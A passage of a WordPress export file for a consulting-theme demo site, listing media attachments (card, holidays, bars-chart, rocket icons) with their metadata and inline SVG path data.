		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>card</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/elements__trashed/card/</link>
		<pubDate>Wed, 09 Sep 2020 07:26:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/card.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>638</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:26:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:26:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[card]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/card.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/card.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512.01 512.01"><g><path d="m479.659 248.51h-72.427l27.649-15.963c15.448-8.919 20.76-28.743 11.841-44.191l-85.052-147.317-1.922-3.329-12.424-21.52c-4.32-7.483-11.297-12.836-19.644-15.073-8.349-2.238-17.065-1.088-24.548 3.232l-154.14 88.993c-3.587 2.071-4.816 6.658-2.745 10.245s6.658 4.817 10.245 2.745l154.14-88.993c8.284-4.782 18.917-1.935 23.701 6.351l8.675 15.025-316.994 183.016-8.675-15.026c-2.317-4.013-2.933-8.689-1.733-13.166 1.2-4.476 4.07-8.217 8.084-10.535l105.905-61.144c3.587-2.071 4.816-6.658 2.745-10.245s-6.658-4.817-10.245-2.745l-105.906 61.145c-7.483 4.32-12.836 11.296-15.073 19.643-2.236 8.346-1.089 17.064 3.232 24.547l12.423 21.517c.001.001.001.003.002.004l12.425 21.521 74.55 129.125c2.93 5.074 7.173 9.228 12.228 12.056v81.232c0 17.838 14.512 32.35 32.35 32.35h226.715c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-226.714c-9.567 0-17.35-7.783-17.35-17.35v-85.724c.004-.085-.001-.168 0-.253v-112.823c0-9.567 7.783-17.35 17.35-17.35h230.9c.008 0 .015.001.023.001.007 0 .015-.001.023-.001h100.387c9.567 0 17.351 7.783 17.351 17.35v198.8c0 9.567-7.783 17.35-17.351 17.35h-74.616c-4.143 0-7.5 3.358-7.5 7.5s3.357 7.5 7.5 7.5h74.616c17.838 0 32.351-14.512 32.351-32.35v-198.8c-.001-17.838-14.514-32.35-32.352-32.35zm-129.151-196.805 2.637 4.568 6.429 11.136-316.993 183.017-9.067-15.704zm-234.531 229.155v96.692l-65.897-114.136 316.994-183.017 66.658 115.456c4.783 8.285 1.934 18.917-6.351 23.701l-50.149 28.954h-228.905c-17.838 0-32.35 14.512-32.35 32.35z"></path><path d="m389.037 154.707c-2.07-3.587-6.66-4.816-10.245-2.745l-71.736 41.417c-3.587 2.071-4.816 6.658-2.745 10.245 1.389 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006l71.736-41.417c3.587-2.071 4.816-6.658 2.745-10.245z"></path><path d="m402.858 193.646c3.587-2.071 4.816-6.658 2.745-10.245s-6.66-4.816-10.245-2.745l-28.694 16.567c-3.587 2.071-4.816 6.658-2.745 10.245 1.39 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006z"></path><path d="m363.409 346.343h83.4c8.547 0 15.5-6.953 15.5-15.5v-17.133c0-8.547-6.953-15.5-15.5-15.5h-83.4c-8.547 0-15.5 6.953-15.5 15.5v17.133c0 8.547 6.953 15.5 15.5 15.5zm-.5-32.633c0-.276.225-.5.5-.5h83.4c.275 0 .5.224.5.5v17.133c0 .276-.225.5-.5.5h-83.4c-.275 0-.5-.224-.5-.5z"></path><path d="m246.943 347.41v-50.267c0-8.547-6.953-15.5-15.5-15.5h-66.833c-8.547 0-15.5 6.953-15.5 15.5v50.267c0 8.547 6.953 15.5 15.5 15.5h66.833c8.547 0 15.5-6.953 15.5-15.5zm-15-50.267v17.633h-26.417v-18.133h25.917c.276 0 .5.224.5.5zm-67.333-.5h25.917v18.133h-26.417v-17.633c0-.276.224-.5.5-.5zm-.5 50.767v-17.633h67.833v17.633c0 .276-.224.5-.5.5h-66.833c-.276 0-.5-.224-.5-.5z"></path><path d="m156.61 430.743c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5h33.133c4.142 0 7.5-3.358 7.5-7.5s-3.358-7.5-7.5-7.5z"></path><path d="m222.876 445.743h99.4c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-99.4c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path><path d="m355.409 445.743h49.7c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-49.7c-4.143 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>holidays</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/elements__trashed/holidays/</link>
		<pubDate>Wed, 09 Sep 2020 07:33:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/holidays.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>643</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:33:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:33:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[holidays]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/holidays.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/holidays.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bars-chart</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/elements__trashed/bars-chart/</link>
		<pubDate>Wed, 09 Sep 2020 07:44:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bars-chart.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>648</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:44:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:44:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bars-chart]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bars-chart.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bars-chart.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>rocket</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/elements__trashed/rocket/</link>
		<pubDate>Wed, 09 Sep 2020 07:46:16 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/rocket.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>649</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 07:46:16]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 07:46:16]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[rocket]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>624</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/rocket.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/rocket.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
